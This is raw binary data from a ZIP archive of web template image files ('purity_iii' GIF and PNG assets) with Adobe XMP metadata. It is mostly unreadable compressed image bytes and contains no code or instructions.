i�T&�A1�s�Ӓ���h��#�R;��Dz"f[S�)Msh���7�9��3�w<'�-���.@J���&@����{��9Ꮞ��8�,�(����e@�?���շ-*j�SQ���^_P�7�E��!e�A����:@蘒�붰�-8a�f8	�҃U�eo ��/k W�'٪�`2� �!���������STT K���/�rohczZ��[��	�U���nѷ0;��x�=N�Ղ�K[�l�u�%�������c�Vc���	1`�'wh͒3�$S��d���+�+�t�8M�&C��as�994�Q:�t&�_]��
&���|�w�������M��Ef8,�r�@z*<6;�n��Φ��KO��L9]NG��*az��r����f����o�����z��Z]�u�4�L�-��0@P{LFL�C{�=䶗���L>�KՕԀ���w|)�<e|"�+�_�?���'V$V87�2�/�q�9�����U�s�"�p	 W�(>
�\���죯�}mNΐ�r��{1�����X�t�u��7�]�}�>k�%��
��i�0��<��+#Y$�t[�%����(�t��D41��LEIs�*�MU�d�������d�������0��z���G$�p�pWh��I�K�Z�������h�*���8 �݉�'�y�󞰵#�_o����D��-C�}���dž�:j�Xw��.|��66.<��0rאF��+��:q�p��c��n2�F�r7͔���p4F
�B�8V���|�]\���r�8FX�8�^�@�R�ӬI)R
`�E:�xj<5=JڴW�Wm����ފ�co��]��Ř�f+@-�fO�&6��fUY��"��|pwl�m���e��Xk�T"��28U�6?4:�PJ��P1�����M ��o8�	�{o������r���G@o�	����N���>^��@���fQ[&��t�p 7�Mr��ܧ��I�L�1�i0���H�/�-@ �
���v;�nzZzp���_=�W�q���:@���@)���32r�R������m�+���h�����>@IW8U�A@j��O(�e�I`G�Q�2R�In�?�$�Y�nܤ�!���� 1�cn��Qa܇66j:j���w[�m���V���@x��<�
l5�@���0�5�\��vo��r��1{3�&�,�+��o,�N!��M-�<���^
�
��w���~������ك������gt�x�#�O~�%J���~��V��;�0��z�
�
����u�jGV���
�e�(��Hn�X�'�,j9-��]~�۩��1)�	s��W�W\�?�����������­ow��\�<��������G�F��I���/���{?�i��˱Ql�']lQtMt�.Y���
�z6+�-�-��y��l3a'ߖo#��O<1�d�iF�{���㈰հ���D�|�!�X!V��S<�2�W"�޽�'�-�)�&^�؋I'�h�|_� F��P�r~`��r1�]����y�
r��tM�)ݔ��lwN9�>���=����ˏ��/�����P#o�dZ����Y��{�/_�Z+M�2�CL�D��[�P��%��1Wb�<�.��чm����6@v�L2Y�H����> _z��b i*=�K�j��I
<.@�ʼn��6��P�e%}��	ߊ>	I�W������H�J�W2Md0��Bh�<VP��^�:1R�\%W̢�X,�ݒ�.t�a��lzHvH6 ��<�aE��D�<v(�T���Sz����<�1�m�M�b��	����W3uF���[	�?�@��
��r�
?W���ᆱ{W�*�*����O3��g�0�LU��{�'K뿸�7 ,b 3L+�
0��uݺ;%��T�i=.��Xު��ʌ=t+t���q�B�	UN����@#ɀ���� ����ܢy����2�~�mu�	r$���ꭀ~7� �@
e��
@z�(s�����J�N,��Q[JVU�u�+���.\.!muu��#�wR~��v�vlHQR>M'T�Ѳ*4C���M�W�^-�YEw����w��~4~4�ݎn�K5�⩓:�P W��
�*���Q@ňQ.����^|uO*��=��Ȭ|c��ӕ�g��?�q�T%\s���e.o����4����Z��hojo"�<�
�`�R
�v�塺P�
���:�p]�ni�B�<Ֆu�z؞����eo��n��Q�Q3s���0�6V�V��]̘���t���_���;�e�ҧ���B�bmV��q��b�K�Ȟ&V\;��C����WQ��h��!f�܃����>Zgs����^UL3�<�".�/�}����m��},�\nV�.]ĕ�;qw��K|�G��F������s�tL^�W�=M��7���¤����R�5h
]e[�u
؆�*�ƞ�_��>@�9�=�H�¦HR���(�E=�f)YJ~�ŶrQ\�����l;�*4\���ҩ@2I&@]�<?�)B�H]�`P���*(Ȫ���7�7�s{��o�``~'�w�2QL ��l{fHi��y��O�,eYUhStE��Uh'=�f�I��4�f���˗����7��
��Oa,N�b��L������_��(�n���~�{>4�5�9�p�pp���VM�ȿ�_���i��	�5=����=�ח�h ?�~������$�d�E-j�{�d�E�FF�AiP3�_�h�h�2�ܯ6}��
������������-s�����b~���2"sW��� �1͞f��<"�R���q����ی^�8.=.��
�Eoq�`K��+��ݴ�f�З��=@#=Y�,�Bv���z�]:��s?g�"�Ȍ�蠐*��LY�c�p�S�W�b���ѹn�n����v�6��
������|��G�##@6u�N 1Uݎ�[��lz?=�+��\��M�W:Թ���$ը���H.�PuB�yR�h����ZBK:No�[�Ei�#j�m��4�)�O�'�`v�˂��`�A�A��&����j�%Z�&��ב)�[*�x��J�Ĺi��H[���$�
�G�_�@n�
6$�8�	�NV�
�M�$*Q�Qv8����J�tXzX�*�����~h�+�j#U��sn�ĢĢ�E-�G��tZ�6[���f��n�����ҹ%��Q�o���]�����$z���ܕK����+�賘g1o͋��A%��W�U�a�5I�$@_�k�6�q�f��…���H)��Ior�kٵ�
_���,p>��w ��w���K�M�72�Q�B�c�zv��5<s1���<�����S2��^�ז>OIy����R�
�ɦ]�.@�4�Ei�I")$�7��I����1��D���@ڵ������aUhT��t�3�U�AȦ"}IjI-�0�f����NV�*Y��>`��3�L*�
�N�):ٛ�{K�*�
����J�U�+%{3�7��e���@�������XF.(�`�����Ù���6����?���������^c��f���xb%V�Đe�,�����8vP���ݤv�,�g9aÒ�9뜵Gc�]�(��q�������r<�������mͶ@qXwX7�
=s>�N���׬hV��yY�@�,���li���wo}��T�n>�O��/�����������U[�[�N����4�%3dR�*�*:'\������3�k�yM�7�M�G���]q��kt{(B�*����\���H�]�N�`W@�uP���Ƚ��W�,���Y5~:I`��d\0�1��`Ni������2�BI)0��9�8R*zvŌ��)OS�4,
tY����w��pߪ�{1�b����/
��0��T|4v4��z���IW�+YS�g���8�oF�F��_�@Nn�
RA�̿,yY�
xz9gz��|/�=��x�׾{����ѩѩb7bJ6%�,w���YB�f�]��z��{��{�F2�	 ���x �����n�Yb�X�{,=�x�#��\y�\A�z�x�;p'~'^[DrSI�C�'� ����O�غ�:��8�*�ff4N1m@�����������(������ s�����`V����I�懚�T6 ���~4����ҥu*jt���Vv5�M 2���u�u@�Z�N���߉�
�����*��@-q�q_���g�E���JRI*��Y3k�T&=�ڗ^�U\�HHI�*S�2�Ы�u�p�#ڡ(�QYQ�C�Z�jS*t������@�@4�7}�Y�{ӿ�����6s���*���u���W@.w���7�n�l�,��~��͝*�����_�R��z䟗G~����_��D&@B�Ynz�l`�R�����T�ަ�
:�L�L4�[��;x>x�TXbX"�sv)�˸����?X\�ǩǩ�����RJ���	yG�a=	�O��hR�ܷ�ߚ�m����Va�Z�F �F�7s�	Hw���h�H�T��E��5Ukߩ��\�x�-b&f��O.��/t9u�Z���w\u�:��z/��x@���ޕ����d�ɑ�����2�/CW��;#5>��j$r���&�=�=�$8r9�*�)|��=���R�;
}�b�� %(��L�I7�r�Ylh�ºa�x;o�}�\�\��|������Ml"��ī����H[/�_�mKY�˶��C��k_�@��T1Ut��&�IO��M[h��������cۿ��P�!ˬ3���cޏ��s�K�%�n�+��X������"��|�������E���X�)~*誸d1Z�AN���k�I�a�a����+��#a]�g�Z�����*����l��1_1_ًF�X(�פjRR�Х��WLV���J��\�|��3v��z.{.侴.������G���P
����OM�gre�P���2�����<8�*^�����u�3�����'��e����
��g��z��-W��褢�.UHR�ֱul�L�{�=q8L9��$+6��R
��
?���6��:U��
hx�`�Vj��W�E�o�P'��Ax“O=�-�����ދ��~1*�u���_P��y��������{���� �:�yJ�!q�MU���
�n�3�u�/#<	f�o|���8��P�a�����{�_�G=��卣����+\z�9��.h����ݗҏW�V��)�-5ʥr)��;�9�h�?��G���c��{K1U"6��oh���nP��T1UG�ް��P��i�Ց_���!@��!m�@��~����%tY˾��>T���z|��*-�%�Ċ&��]�gz���z@���Ǯ���~'�‘�H�M����=�����n��*��'���)Х2����(MW0@��k������]�]���Ǐ�G���ɟ}�g���^�^5�̙��� (�L����@KdQԫ��L1O�����-@3��m�v���a퇵ي����O���{v�,�MMk�-�k{��f���m�mc��~C��f䲕ޡw0��ޗߗ1��'ޞx��ӹ�sܕ�ɔ��:N�k�5�Fh���-a���*��Z�	�F�;zP?S?ù<�O����ǹ}�ѱ����PL�i;Rh�JbXU'�:u��>��#{d���I҂F�F�7
rF|F�N
�]�.{�н� G�ӄY�E �oBU����A{A^��^�߽�����/���ө����4�8�vn
8�W�������h�h )���r�;�
 N鵟%�i �N fՔ�K#�E/z.���2j�j���J�Q4�G��{}���!q}D�Gn�6n�0���3{1�P3�����w��@�ܳ���ܣh�ˑǹǹ��:j%j�#�#�F����X�W
���n��Vv�{mL?��i�I���Z�����ݱ��x�tj�Z��
'��`�-�i-c-#<BX����dCbBb��ݳ}i��h�����v@��j{��?����?��!;dӚ���L�c��s��Lpdp���A�
���p�A��&@�==��2�}9�+za�RQ#�d��T�"?��W��'wJ��w^)�cK�ǻ�\U��{�tVeq]�N�w�:yz
�m�^��TY$ޒ����^��)�u~��ˤ�i>��^����6�7��(�q��o$+B*RZ�*tGU+WW�A����x@��ԟ��n�d�'��	�VyV��+�<W@"ε�k(���$>dS��]=�"wt���H�G�1�W��Ì3㚫�9�`��<k��r���Y�K����@�l��8 ��gmX�\�M�5{�=�|����u��#�#�)�g>L�0	�Yj<�@5Pc�[�W{���0��זk��jn�-�-�`
�rM���-�D�Q4[��&�K��8�Q^���T0sF`��.g�&�W�O�ʸ3Рg���[Ҏ���v��膾���] d����s@?�I���sG�r���] A��x�~6H,P ��e�pL�һbm����@�b���
;BG�@����	F	�:��HQ�l���L�^���̮�p��u)�8�8�<������o8(����h)%�)Pz����uZ�/��_��Z�lL��ZS�@Z�oȽ�3��ϻx��Ԅ�<��4s�ܤa�P�뼿΋Ju�o�n�J��9$.$�r���'��df�����d�O���[=��#.�埿�s��[�[���|���n
]�x}�������T-��L�pklk����,�=�( `i$���S��+������9=��������#y6��;MRt1��R�Kt
3���\��%�Nُ���1:�K�(z3t��{�o�B��V�.�=��9���IG|Α�D���&����L��-	Ƥ���4Z�z62�J�������h,!]!]_f�2e$J^���"� ���搮I�8[��\Շ�/�aTԽ\��q�pc���&�Uyї�$�u	aB �t��A�Gw���]�%�%�n
O�i�m$��Bڅ4m��Y?��B�r"">474WwI�����`:z|��2�j�4}'_��>m"���Pj}��2U�
JM~���=I�t��\װ�nٰl��S���X1F�Э�!IV�R���?�~mFE�^'�	���B)`�,�_t8��'�'0.Ӿi��&&:"g�Y�j%��ff
o��7��Fe*ԣ����F�h������j�+[�DX`ۛ��O�K�#�SAS#���ݕo�~����?�/���%�%�E	�Reȧ|�_�{>�`��׃�8�׽
�^-t�w�z�����q�?O�W��?�+�
�빌e��+��L�fA���
�[�[�Z����&z�euY�c��ݾݾ�M�y�<�|��򆽊�er�<�a4@&;���v�;ǝ�����g2�B�fV3�W��
�v�s�>RZ>$R��i�HD�Seؔi"M�	�u���6��^�I��r�45C��%�m�t���;��v�N ��8m�g$��jEm�f�l@*P@gb��Y3k��#��h\:����a[Aɬ
h�$3hB��9_ϼN�D���4�����짖���)�{66H%�i�i�P�������i���~�~���с��u�J�KX�w|*_b�z$�y��r�]T�I-jaa��~ZC���fP7��R�!���O<��^^�9��ӈ��=�GH����!�G�#��#���+o��Ŧ�
z �"/��Tۿv�g��;��X�3�W=!oK��O?��_o������`����B�I�?i�m�z�D�Li�9����n��k2zN��>���"ֱ�u�i�]�9U�V��Z�I) ��޺N
x^8͞���2~����c?�T��?�=�*�}}��M���@nP[��Xw,���ņ�g�)����+�+��p��c���h}�X�Uټ}TC�]`?��9�~�s��F�G�Īؖ^�t�v�d�dh#F(�n�n8�?�����5���{��n�h�G+�:�~��(�F�
���y�u�%�!���vHך��oGv����á{_�߿�(b���"���?L��Ӗ�*o�&�K��ݗ���=��KN�cԽY�[O�P%�_U�����~�i��+��=�<�8Ὑ�f]�b��V�6�@�UeI���T�pK	�tTt�N�>I�N�4��/l�L��BT�+��
�Ź�	Մ������omʑ?��IĹj�F^�R�ʖ)T�������� v��\M���-'ல�Y�ҫ��L2H@�&�	+���RF$7|�I�R�CӁ�/ ?�yiBJ����gh,�h�/�XRAO�b��B��ూR��J���<�Uφg@�:�(�+Z(�H#Vh��C��x���?��6J�R;@�u��J@������#�����E#�YRO���$��iL�4-�?~��2����<��-r��"v�Z�����siS��Z*G!
QY�d
' ���y��vrK$�d@��)e�ܝ�N�6���?�P[��c��/o G�ʃ�"�d�qҴ4
��-���{���:��s8�gי%îaW�.$n��"{����)�K�L]&�I���@*�}z�N'ŖƖ�S!�S���s��4�n�-8q�.�%���ya��*��@]hy15�%�P?��]��:�z_�^�'yH��8-�$�ZoȡSi�L` � 0h�����D@����������nh7�T�8b'vy
�^�xY���0�n�p�p��J�s�$�?��hW�H���$����W��z��ly�#!��K���f&�IߟG7����T0AtTN�SFJJBo�����@���U@�|��b s*�P��À�lp6��]�UTol�6Y�,%���v��e��/ ?��|�}���
,�ʐ_��~�������*41f7(3(`�4	������6��Y=����������+�{�`J�z�me[�V�s;���Q�r8T���|�s�"��u�{3m���5#��8������GG�V�Nȿi ?K������x�q������gB����\钧�S�!ͥ�x@f�%f�£5�Bx6��0�\e�(U}����P!�W��9��.ZN+i�ƍN��ͪ�q�V�|�C<1�8��_��P�B�c��5�Q�|`�ϙ��*_�j�~�&�$�<P��AYW��•�����;~���`�C�C���ryR�{O��( W����
��)�S�եH9�%�U�U��>6���ܕ�'O{���=%��]�ȣ]������d�if��+=p,��\��C釀�t��_�����$��x ժ=t������(E��3��+��0�8�1Θ�-G8:���%
�ޕ'�a����{��y�������.��p�}���N��ݠf�����|�w��Q ���^O/��\��0�#ߞ|{`�4'h�5۟�!Q���%�z�̒Y@͸9�`;UK�V�E�Hd��~^����4#��L����?eJ�f=�W'{��}����>��w�8�����7���4��/��2r�����e�\���E��٥ާ�b�C7h.�|E�m�M�-�-)*-,Y���'�X+�U�=���^vo��JS�T2|5o({���P�q�%�D�&Cqo$iT��M�=~�|4�zUQ�c,�Lc&����*��?��6k7k�ӏ��d�no��
���dc2�Y���Ѝ��,T��}�\a��Mͪfm��w�ލz��qY��Yqw�O�J�J޶J�ǻǻ�����V�[��
y�v��jev_�U�W3����~1�b�����u��e�c��/wWm�n�O��CT|:��
��;�3���i�8�_i�S�Dy߅x�Is�OS������~�7�����o��z����/p:}.]޽��8+#W��HV�*@c<�<����xf<��x
�j�
�~�����q^Ty2��J�aH
�!5���1?�C1št�.�V�^�j����BP�~��2��uQ�~ք�v�?�@j���{�>/���Κx�����.����o;�#@����99p^8q|�=_]�C����X�b^q������~���4��g���,\���;.�������:Cg\VJ�$Rq[d�& w��;���t8%u�E3��Q6��n7�V�-�\���A`��0p���%od�K��l���\�>֩->ѯ�ɽq WΛI1g��f�f�J�L˾e�e�3v=m=�4,�#
�5���Tt����vm�N���Ar)�
br��mǷ��*ӜiзF#�����V��+���2�~�X�tE.E.oi.GNDN�WP����}�9燒��/v���M��i?f�����?�w��&�5��^W�+ 6.��M9�}����@�!��d�L���\}L7�V&K���!9$P3q��Cz ��p�/�PJ��j~��ib�^r:��GPPP*��UH�4���������,�n��{��=�>
t�7O��w����{|ο��#���u�y�'q$@%�ȏ�G�#L�s��*+*���U�E�c�q�ߊQ����90�O!���xAn^���2 ��>_4�{߿��{�QG�#�/e�f�R���R&����
�����1f�G�|#��\�K�ͳ����S���.�����_�{>)L�L�L�uI[N���ֺ�6no��������s��س1�A������������!+!+�4 �3�nٺ�u?�K��G{+:���dr���җ5t���u�}�{�m���/v4���8�ğ�I<`��o_h��!nԠH>�2�_ti��Rj��t����10��*l<�C<hm�
>P�_*���{mM���
�
�^�W�U1�_���؈N�?�~r�8&��-�[������s��B�0�L&���~���u���޷�����R����IW(�xv��c�>5���P�JT������z�m����f�ܻE���T�H��G���=�/��T[��3d���n�s	���V��z� Skk�)M�W��h��?���r$B��M(C�v�x�G��ó����G������d�Pc��\}����_k�ܳdY���H�2'Sէ\�$���_�������l���r�/��5O�w`�^�_��Kt�����]�M���J���7�x����}�_�����&�%�^W�+�&�#�#��[�]�
����`Z��z[F�(&1����*�۫�&ݑ�Hw�s��0#0�2���~`/�Cw�Χ�����{�z�=�z��7��#�}��@����#����<����SZg�`����ox�y��\�{�|��{=�=j%C6+{y���i�u��aAD��ecb�����b�IW��W��.)�t�����*-�J���x��cb�&�.����U*�>P�M�n���{+?�@�E�Z��vo�VE�4x��g�B���8�9W珓�6"9-��Hd,���,Bl1����B"B$�b	�"�XzX�E�X����E��dB�!�FӲ���{�>�3�C����2���̝�{��|��~�z�z��n��b��m�6�ry4��B&��L�lI�_)���R�趾�hX�/�!�Y�R��|S֔�׻^�y�U)����������s[���N����E/�8�l�Ϩ����?p���y�a�_]���~<��	s�y
�5c�gb�������SKg?���f^nWg�o�;��{�c��ǻ�wC�ֺ�uPo<5��u~a`a(��=-��#�2�fz~�ޯU���q�\������n���܂�����9�tDz>��������^��Iafb���#p��;
��x�"l���-��6���5o�7�4�m�6 @��*�Ly�W��T�
�%O���:��LqH�|��k[bUޒ��-r0[�p���ULɈ�	s���ݍ�F7��'
'�]���ǥ���ќQ;EX�?jFn�8k�E����D�k�k�~>w2_�ןk�~�mݶ�<i>y|��f�Z��C,*NQj��]]/�^_S���p���ʞʞ?.�S]]	��`��#�WrP~ʝ�l��C�ٕ>��BV���X�X�+OT���̝�N��/<YxT����R���FJ��P�dJ#��k+ɉ|�=IԈQ2*�2�}��Lyv��>`��/~=r��a�	���sf�s�r�
B!0}s�s�`}F�e	H�ϻt3��Gm��_����ox�����f)R�GxB�K�qP��g+`�o�v��+�&O�jv<���Wb�y�����c�1�K��
EA[��Wz���-�$���"o�7֩����A�^6X6躶6�l�yNJ��z[Ų�Z�I�Q�v�e�����=�=�W�F�5�,+ve�<F�Q9���m���u��΁V���`\�����bX��}�_��_�f�j�=5Sw�6|6��9�<`���u�g�3������
/����7�o������E@�Z>��(�X�U�!
��r�Vy�aa,yU^�WI,����"(��n��f�Y�Y��{�!��/�	�,����~%45is�d0yY��cRkq����{�%}%}�=�b�r`8m�'��Q��o]�\��N��#ڐ��,ț�_�e/��:ǟ���ѻ{�IEND�B`�PKԜ�\/�
1GG purity_iii/images/nav-active.gifnu&1i�GIF89a����!�XMP DataXMP<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:71942762B02011E3BDACDDE460F7171A" xmpMM:DocumentID="xmp.did:71942763B02011E3BDACDDE460F7171A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:71942760B02011E3BDACDDE460F7171A" stRef:documentID="xmp.did:71942761B02011E3BDACDDE460F7171A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�������������������������������������������������������������������������������������������������������������������������������~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJIHGFEDCBA@?>=<;:9876543210/.-,+*)('&%$#"! 

	!�,
;PKԜ�\�Q0s*purity_iii/images/porfolio-item-states.pngnu&1i��PNG


IHDRF��ٶ�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:930825DB7C3411E3A6D1B44D7E9692D6" xmpMM:DocumentID="xmp.did:930825DC7C3411E3A6D1B44D7E9692D6"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:930825D97C3411E3A6D1B44D7E9692D6" stRef:documentID="xmp.did:930825DA7C3411E3A6D1B44D7E9692D6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�vH4yIDATx���tSe��7�g��]
,�@�SA@Fe�at=ȢGVP�wta��pFWv��p<2:.=���:2��j��RiK��>B�6ϛ�d��KR��InM�pK������G�S�_�
'@
�&�؜�7�hs
7E�G��*0��c�|t�)��
Sf{���g�
�q�=����MN� ����L�%����)@-'+�2�q��'�^��p���!�C�=Ipp��0tU:����	C���1S�W.3=z���k.�
1��k(��BN����z�P����Hp��'����^����0F'O:��
�2��8e��B���ay�[���}_�����Z��(8lN��ؓޭ�h^䪩�c���d��q�(G�4A��	՗�S"��Ѿ���1:�]��G�!ר��M�g�-(IJΡcy1Ƒ��1Z�=��U��5��O7v�:g�m�a��a	o9t���ZY^��Hp޺{L/�Yjr����#u	�V���U{�{Yn�$F�v9��u��yC7
��%��M ����d�l�H�L�,^�5�V{�u$��������]�a�j^��U��wU�E�;��Ii1�-����t+�����a ��~�?�����<���S��rD�	�09ٓ��)�5���a��C�]?���+	�a`�
ѧ�K�Y^�{��U>��
t��,i-|(x�W���/w��y��BX|�	�k3����ǒCp:��0��eW�8O�8Ǜ���%3����}���o�!"g�\x��5��	�7�qDM�|�(.ǵ�O{�.�С�ޛ��j=��ஃ��J�Kc�M�严�Z�����`�4�gLYSi��%t(�QZ���!x�#��-�����6,+g�}����3�]�VYnλ���<�w�p9?�������:�|�X7��;T�:"}[�v���pZ�$�/(!c&Z��.���­f���©�Z�?���m��I��ښc�	Ɵ�:��{�;��|��]7B�FF^������n��˲���
&�G�&�W���9�P>"�̔��͚�&xd�H�+�G��s�gB���.P˙��|�e݊H�'�A~�U�YX9��{�csqd�⾝�PQ��ݣ
I
�����0΢rw$��[��[�nx헓	
n9Ͽ�<���(Qz�VI�	�|E
�h�0����?\>�ݾ�n?E�%�N+"�oxw9�y�)���''Wʷ�������v���i���\�?��޻��9���uV�9�=��`���vr����f��:�ss�g5��lr�ow��?�t/�����^��r �H�������t���ƹ����e:hU2�r��l�d�&�K��p�m�g�A?���8�#��#xsN,()Cp�O=�t�)#��� �f��Y�WG�TrV����1���������!E���q���n��#���tX>���;����0~�Σ�N�0�8)Cp,��:��D�
?N�Z�YB1�W�	���:Dk�ACp����sW�qL� �U�O�A	�DZ�Ki�K�3hapx��w(��^�)��c����eb�z��~�s��8i���U��'m`�ݱ�V�V���V0�=ge�8i�y�V)Wł��0��|�V*�'ma�ӹ�<�$��8;��#���q��p�F�3$`8;(��	�8C���z�R(�I0�8��R�Ï�
�l�`�q�R
�J0|8��9���?���Y����D�忑`�p��gγ��S��PzƟN���*�t[�/�R���Tʫ߂��,P�.�rF��=�M���M��o�Z)���b�J#U5M�ڶY]f9‘
w��J�2	�g�&8��r�RU��'��+�6��S���f|8.��������)URU3�n�Q>q\+i�_�������)������^Zi�e�R���D؉r���4f�<�մǣe���@��¸��f
p��C�/�8KL7�!g�'��c�_�AQ�X�>fQJ�DCp����TA{��pz��RuyT�����)��F�������<r�-֖��7��jt:/����Z�g�:r^�rN�-�ǖc�pL�h��a��G����j���@Zn)��`|�z4�S��_�ګ�`��Khˉ�G��
��	�)̘�^���bs�.�ۄ�0�%�F�(`ʨ�	lj	Əcog��oQ8��C�}�aߧO�`q�G΅��߇[J�ܥ���J�饿H(�h{�h(/��;�7����s� 
�7��������n%�E�w6',����V��&zdrG�(82uy�o�B~ƭk����s��3_NHB����5F�ӳ��<��<�[Ipd:qq8Q���$d� �}��i0M��ghέ�[�l��}���?��*���ed�s��2ڵDҭbN���.����d���z�W�
��.�W?��;�$k�30e���o�����˧�O'��na����K�9N��:Ms�2ڿ/.ۭ��>MG��"ܽ�C��	9�_�*��ϻ��^����a��P��u�p�H����ԫ[��6VcxMWQ>���L_C^9rk/'��@��0�Jx�#�<'�0�V���.�����G���$cg[Q�fT��!�I��Xg�[���`���X�RMZE��[
F�V�
3��4�����W�	���VeNۗ�k	ڲ�C��~�k(���m�	�W5G`��~&�V��%_�P�,՜R3��0��"h�Ԑ��s&�c`���t0�Ŧ��\,���u�^���u�S�>@��(���n�_��HN��綒<�Q��d��B�
�]-�n�?{���B�{}P|�l��^y(R���p�8��0�!���'���p��Z��Q��I�5x|���S�g�hf��Ixv�g�8�}Pp.�7ay�d�g�4��ʼn|��K�3�pBp~�����C�O��L8�Sd*M޶C�8�s
¡9���r�쓽ZT(Φ��'�Ya�̣P��󃹆�g���n=��H�~L��{���7u��qt�-���?����DϏ�cJ���8'<
���Xa(\��88���v�#G8T�8�DJ_2����O<
坑�D:�$eO�@C��:$dU.V��,d.�G��,�r�L�W�X�(���f�!�\��Aw����o�Ay#�9�p�'Π��
��)�B�p�����G��W��Ki�9�p����7�"����~1q��.Z��Vx�TՌ��p�^���t��f<8{�2�J����༉pVł��w�Ӝ�u��h�8i]���B8�E�����N��F���y�Vk%��q��2�'$^�%�#U5��‘����نp��fap���TՌ/(���a��f�8�-G�jg��f��f�8^�3�Ǫf_I&����fݠTJU�zD[�Zk@�h0�F�\P�r���&HvU�ٝ�ԜI���yyRU���[���Y#G����]���1�Yf�͕pB�k�rF�(G8RU��'�++� �2}v�TՌ�TRR��Ζ����d��LЙLRU�0ݪ|(��Vj����q�YYRU3><�k33�CG��ࠜ3Tp"�vt�2MFF�p�˗�$��6nL*N�1WΜ��,..G8�x���濕�US�Ԗ�F�g��!�2��h�J���`��Hj��z�d
^�6�b�0Z-�n�
��81mm��#Nϖ��h�:����D眘�|�Ν��(*�����v����A3j�:ԍ<g��
	m9�#"4;k[��Q���\���
*��?nܷ�WN��!pd/Z�ŋ��x�W^�>�}�\$ok^�x,i0=p��NA8�\�o�����Sz����vG��c��f�k.��;�����e��[��x.͚�g��J��l��P��
���>�����J��)ְ��Mzn�ɓ0������b<s�h]�g��f3�xXv���ł�����`�1������t)�-pUVƥ[����K����(4����?�x� ԅ�'��w�Q�?OΉGˉ�7�9�G��\�z���,���3l���+��n�=�7�`��hT�8u*l�hsRaH�/)�y��׬�!��!>���~�-�=県[n��)*���/NB��o���V��w�B�ܭ����W�:�[oA�6��'�js}�Y]N��Z-�6��yrԌ���Q���֒��N��h9!NB/���P��ə.W��y��o {��>��B]/:��xß��H���‰�p�_8,�fcA�A4�?��~W �4��`(.=(閼�"YS5��
�O�/���d	�g�ƙ3��Ϣ�ʓv}ZxN���}�v��TE/�LZN0ؖ����[��or578�(m}�ɨrR/B8��)�#h�iX����pnb說"+t���<.)Nү�Bˇ��f�IN �Н?��r֯���WG5�'f���NGˈO�nY���<�↦�/�&��B��J�p>�df�a�rA8��*�#%�Rϸ��7����@���uU��>7�V�s4�-�#%/��ji9��ȸu+����zLm4���d	&$�mm� �;�$��h�wTm0,L4Π���v��Gg1�0RU3�#*�a	‘����������� ���3(o�B8�:�=���w�9,�w�R����f<8� �{�T�,4����2�q��fQ��_���/&N��E���Ph4���V���ֽgEIU�p�(�ڕ���
��M�F�*���S���^��ՏF���%X�}�y,�2�i_���T��k �kh�D���B�Z	ΐ��:;�*�Bq�T����\������8�/��#U5��
�HU���l�)�RU3��\���T�,��#U5��I�PHU�xqX���Ï�_������_�i-9%�IEND�B`�PKԜ�\Y�Q�&�&�purity_iii/images/faces.pngnu&1i��PNG


IHDRF���S�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:2CD43BA37F2D11E3A61CBE6A72EB805A" xmpMM:DocumentID="xmp.did:2CD43BA47F2D11E3A61CBE6A72EB805A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2CD43BA17F2D11E3A61CBE6A72EB805A" stRef:documentID="xmp.did:2CD43BA27F2D11E3A61CBE6A72EB805A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�����IDATx�Խ�d�Y&��S9��c�V'u��,a��<8����`�,��Y��2k^�����16h����%Y�I��C�B�s��[��y��SU�e�m��.uݺU����÷����g��~\וz��'�y�r�qG�v��=ſ��>W���6��咸�A\�Z���p�k�u�,�οE,�u��슳��.;�{{�q�xK�i����_��r�*�qo
b��m�}���h�6����j�:_�'(ȍ�G�!<~���6o�,kBl���F�;�`Q�e�w�Ko.��n��rqx?�h����X£)=^ϟ�p�8���SX���m�-�mIg�/_</O?��T�U	��208(�[�����b
�P蓁��H$F:Nb�'��֏�y���/��I<��G��?5�����N�ҿ��c��[MY[]۶euuIν��<�ͯ�N��A����6�l�%���,�\6+�l���Oȭ��.�Z���4�4d�' �?z?
V�}|�=xl��^d�:&
>�!��?�D�n��/.�˃�+g^<��i7Rk4Td�4�{������D�i������v�)�XL�����;r��)���`4����FǸO����/{*�c�~�8�����#���ʲ<��7�k_}X�$�cl�Y(�h8,A�o6
